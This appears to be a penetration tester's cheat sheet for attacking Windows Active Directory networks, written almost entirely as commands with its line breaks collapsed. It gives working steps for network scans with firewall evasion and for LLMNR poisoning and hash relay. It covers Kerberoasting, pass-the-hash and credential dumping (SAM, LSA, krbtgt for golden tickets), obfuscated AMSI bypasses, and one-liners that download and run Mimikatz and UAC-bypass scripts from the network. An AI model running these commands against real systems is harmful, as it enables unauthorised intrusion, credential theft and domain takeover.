Internal Pentest
-nflag to decrease time avoiding DNS resoltion.-ffragment packets as FW evasion, if no FW/IDS, remove it.Also check FW evasion
# Ping discovery, Top 20, fragment packets, no DNS resolutionsudo nmap -v --top-ports 20 X.X.X.0/24 -f -n --open -oA# Ping discovery, Top 200, fragment packets, no DNS resolution, service versionsudo nmap -v --top-ports 200 X.X.X.0/24 -f -n -sV --open -oA# Top 1000, fragment packets, no DNS resolution, service version, all alive (no ping)sudo nmap -v --top-ports 1000 X.X.X.0/24 -f -n -sV -Pn --open -oA
# httpxcat ip.txt | httpx -silent -random-agent -status-code -timeout 15 -title -web-server -tech-detect -o httpx.txtcat ip.txt | httpx -silent -ports <UNCOMMON.PORTS> -random-agent -status-code -timeout 15 -title -web-server -tech-detect -o httpx_uncommon.txt
Check AD section too
Must-read:
# Detect SMB on networkresponder-RunFinger -i X.X.X.0/24# Find DCnslookup -q=srv _ldap._tcp.dc._msdcs.<domain.name>nslookup -type=srv _ldap._tcp.<domain.name> | grep ldap | cut -d ' ' -f 6 | sed 's/\.$//g'# Enumerate DCldapsearch -h <DC.IP> -x -s base namingcontexts# Check for null session, if got users go for ASREPRoast with GetNPUsersldapsearch -h <DC.IP> -x -b "DC=XX,DC=XX"# Get hashes with no krb preauthGetNPUsers.py [Domain Name]/ -dc-ip [Domain Controller IP address] -request
Enum AD AIO
# https://github.com/CasperGN/ActiveDirectoryEnumerationpython3 -m ade --dc <domain.name> -u <[email protected]> --help
windapsearch
# https://github.com/ropnop/go-windapsearchwindapsearch -d <domain>.<name> -u <user> -p <password> --help
ldap
# Domain usersldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(&(objectClass=user)(objectCategory=person))" name sAMAccountName userPrincipalName memberOf primaryGroupID adminCount userAccountControl description servicePrincipalName objectSid pwdLastSet lastLogon -E pr=1000/noprompt | tee domain_users.txt# Domain computersldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(objectClass=computer)" name dNSHostname memberOf operatingSystem operatingSystemVersion lastLogonTimestamp servicePrincipalName description userAccountControl | tee domain_computers.txt# Domain groupsldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(objectClass=group)" name sAMAccountName memberOf member description objectSid | tee domain_groups.txt
rpcclient
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c dsr_enumtrustdomrpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomainsrpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomusersrpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomgroupsrpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c getdompwinfo
cme
# Run commands# PScme smb <IP> -u <USER> -p '<PASS>' -X 'Get-Host'# CMDcme smb <IP> -u <USER> -p '<PASS>' -x whoami# PTHcme smb <IP> -u <USER> -H <NTHASH> -x whoami# Other methodscme smb <IP> -u <USER> -p '<PASS>' --exec-method {mmcexec,smbexec,atexec,wmiexec}# Dumps# SAMcme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --sam# LSASScme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --lsa# Sessionscme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --sessions# Logged userscme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --loggedon-users# Diskscme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --disks# Userscme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --users #Enumerate users# Groupscme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --groups# Local groupscme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --local-groups# Password policycme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --pass-pol
Find a privileged user creds to reuse in other host
Set to
OffSMB and HTTP in/usr/share/responder/Responder.conf
responder -I ppp0 -A # Only listenresponder -I ppp0 -rv exec bash # Poison
MultiRealy reuses hashes captured in specific host while responder is running
MultiRelay.py -t X.X.X.X -u ALL
# Kerberoasting (hashcat 13100)GetUserSPNs.py -request -save -dc-ip <IP> domain/user # hashcat 13100# BFkerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file># ASREPRoast (hashcat 18200)GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file># PTH/PTK# Request ticketgetTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>getTGT.py <domain_name>/<user_name> -aesKey <aes_key>getTGT.py <domain_name>/<user_name>:[password]# Set ticketexport KRB5CCNAME=<TGT_ccache_file># Use itpsexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passsmbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passwmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
# User hashsecretsdump.py '<DC.NAME>/<User>@<DC.IP>' -just-dc-user user1# krbtgt hash dump -> Golden Ticketsecretsdump.py '<DC.NAME>/<User>@<DC.IP>' -just-dc-user krbtgt
# Basic[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)# ObfuscationsET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )# Other bypass[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)
EternalBlue: use auxiliary/scanner/smb/smb_ms17_010
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"# Invoke-Mimikatz: Dump credentials from memorypowershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"# Import Mimikatz Module to run further commandspowershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"# PowerUp: Privilege escalation checkspowershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”# Invoke-Inveigh and log output to filepowershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"# Invoke-Kerberoast and provide Hashcat compatible hashespowershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"# Invoke-ShareFinder and print output to filepowershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"# Import PowerView Module to run further commandspowershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"# Invoke-Bloodhoundpowershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"# Find GPP Passwords in SYSVOLfindstr /S cpassword $env:logonserver\sysvol*.xml findstr /S cpassword %logonserver%\sysvol*.xml (cmd.exe)# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]runas /user:DOMAIN\USER /noprofile powershell.exe# Insert reg key to enable Wdigest on newer versions of Windows (restart needed)reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
# User Domain$env:USERDNSDOMAIN(Get-ADDomain).DNSRoot# User Domain infoGet-ADUser Anakin# Computer Domain(Get-WmiObject Win32_ComputerSystem).Domain# DNS, NetBIOSName, DomainSIDGet-ADDomain | select DNSRoot,NetBIOSName,DomainSID# Trusted domainsnltest /domain_trusts# Forest infoGet-ADForest# Interesting usersGet-ADUser -Filter * | select SamAccountName# Computer accountsGet-ADObject -LDAPFilter "objectClass=User" -Properties SamAccountName | select SamAccountName# Trust accountsGet-ADUser -LDAPFilter "(SamAccountName=*$)" | select SamAccountName# GroupsGet-ADGroup -Filter * | select SamAccountName# Interesting groupsGet-ADGroup "Domain Admins" -Properties members,memberof# Get DC namesnltest /dclist:<domain.name># Get all users in the current domainGet-NetUser | select -ExpandProperty cn# Get all computers in the current domainGet-NetComputer# Get all domains in current forestGet-NetForestDomain# Get domain/forest trustsGet-NetDomainTrustGet-NetForestTrust# Get information for the DA groupGet-NetGroup -GroupName "Domain Admins"# Find members of the DA groupGet-NetGroupMember -GroupName "Domain Admins" | select -ExpandProperty membername# Find interesting shares in the domain, ignore default sharesInvoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC# Get OUs for current domainGet-NetOU -FullData# Get computers in an OU# %{} is a looping statementGet-NetOU -OUName StudentMachines | %{Get-NetComputer -ADSPath $_}# Get GPOs applied to a specific OUGet-NetOU *student* | select gplinkGet-NetGPO -Name "{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}"# Get Restricted Groups set via GPOs, look for interesting group memberships forced via domainGet-NetGPOGroup# Get incoming ACL for a specific objectGet-ObjectACL -SamAccountName "Domain Admins" -ResolveGUIDs | Select IdentityReference,ActiveDirectoryRights# Find interesting ACLs for the entire domain, show in a readable (left-to-right) formatFind-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -NotContains "DnsAdmins"} | ft# Get interesting outgoing ACLs for a specific user or group# ?{} is a filter statementFind-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "Domain Admins"} | select ObjectDN,ActiveDirectoryRights# Get Applocker PolicyGet-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections# Get computers running LAPS, along with their passwords if we're allowed to read thoseGet-LAPSComputers# Get groups allowed to read LAPS passwordsFind-LAPSDelegatedGroups
Last updated 2 months ago